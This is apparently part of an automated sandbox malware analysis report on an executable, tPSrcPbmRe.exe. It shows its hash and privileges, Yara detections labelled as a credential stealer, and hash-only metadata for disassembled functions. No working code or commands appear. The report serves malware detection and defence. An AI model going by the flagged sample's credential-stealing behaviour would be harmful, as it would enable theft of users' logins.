                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QOkMXiuL9tSDpob4VoQAJ5Yau1tVghFI1jWCMpphIwdmliuSsA%2Bx40rluZM0SGUwEnyWbYOCkNGVdZKDTSrhCJszT4DpWaoszSOzJetNBxMQ5%2F5s4H6xpzywcj4ngJZiNxI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f662f12bb258c75-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1815&rtt_var=688&sent=203&recv=596&lost=0&retrans=0&sent_bytes=2835&recv_bytes=575223&delivery_rate=1580942&cwnd=195&unsent_bytes=0&cid=448e2d1bd56bd577&ts=3259&x=0"


                                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                  Start time:01:09:14
                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\tPSrcPbmRe.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\tPSrcPbmRe.exe"
                                                                                                                                                                                                                                                                  Imagebase:0xa80000
                                                                                                                                                                                                                                                                  File size:1'866'752 bytes
                                                                                                                                                                                                                                                                  MD5 hash:259CEA876B4FF788ED27FAB1F9A978CE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2223056639.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2297990501.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    Function 012EFA18 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000003.2336843987.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_12ed000_tPSrcPbmRe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: %4w
                                                                                                                                                                                                                                                                    • API String ID: 0-3029092977
                                                                                                                                                                                                                                                                    • Opcode ID: c2c248b0d870f4c85397f195bd0df6e134733d96c9cf663df1a9fe3ec37aff5c
                                                                                                                                                                                                                                                                    • Instruction ID: 29db4afe6c7b9cf87fbb2e6bf0476fa4a01b5e04159ca7b4e2de69ee08a11e6c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2c248b0d870f4c85397f195bd0df6e134733d96c9cf663df1a9fe3ec37aff5c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D591AB6184E3C19FC7478B748839591BFB0AE1322471E86DBC8C5CF4A3E26D994AD763
                                                                                                                                                                                                                                                                    Function 012B96C2 Relevance: .3, Instructions: 319COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000003.2375411067.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, Offset: 012B3000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_12b3000_tPSrcPbmRe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: c9e44574e301e9231e0001bd390c0025d2f8e36a49c4326d1ba3d08c39fe731c
                                                                                                                                                                                                                                                                    • Instruction ID: 53e2dfbb508e9d158c921063ec2f9de91997cb32ff64f6499fe31a581ec425d8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9e44574e301e9231e0001bd390c0025d2f8e36a49c4326d1ba3d08c39fe731c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9A111A145E3C29FCB138B7888A55817FB0AE1325871E41DBC1D4CF4B3E22A595ED763
                                                                                                                                                                                                                                                                    Function 012F484F Relevance: .3, Instructions: 286COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000003.2336843987.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_12ed000_tPSrcPbmRe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 41b579e1ed4c3235658c1771ef132004d5d566f962a3b7f4f153764e5406d4a4
                                                                                                                                                                                                                                                                    • Instruction ID: 9e594c85b0dea37727d9cc808d852dfd79279ae30fa9b984c00a951bc298fdb7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41b579e1ed4c3235658c1771ef132004d5d566f962a3b7f4f153764e5406d4a4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9B1796544E7C19FC3479B7888655923FB0AE1321872F45EBC4C1CF5B3E26E494ACB62
                                                                                                                                                                                                                                                                    Function 012ED8E3 Relevance: .2, Instructions: 243COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000003.2336843987.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_12ed000_tPSrcPbmRe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 99fbd161f5d8a4eb136bdf8d8d756aed01a6aa48bca689d5280fd80f2cc47081
                                                                                                                                                                                                                                                                    • Instruction ID: ef41cf8d1e7f7756c4dc9c39019773fa8e69898c37fd5a34140bd361c605d368
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99fbd161f5d8a4eb136bdf8d8d756aed01a6aa48bca689d5280fd80f2cc47081
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0681453001D3DA9FC717CF78CAA9696BFE6BF03214B5D46C9D8C18E2A3C2616644C75A
                                                                                                                                                                                                                                                                    Function 012B8232 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000003.2375411067.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, Offset: 012B3000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_12b3000_tPSrcPbmRe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 9067d51930d746d087fada6e58d875944c9b0ecd2cc7537f2a3dd6a2ab134bff
                                                                                                                                                                                                                                                                    • Instruction ID: 4e8d52502a0b7562c4be01545a8fe2f20fa49a5d343411270a03b6bde6142ac0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9067d51930d746d087fada6e58d875944c9b0ecd2cc7537f2a3dd6a2ab134bff
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B761277144E3C18FC7578B3488A56857FB0AF57224B1A41EBC4C1CF4B7E269590ACB62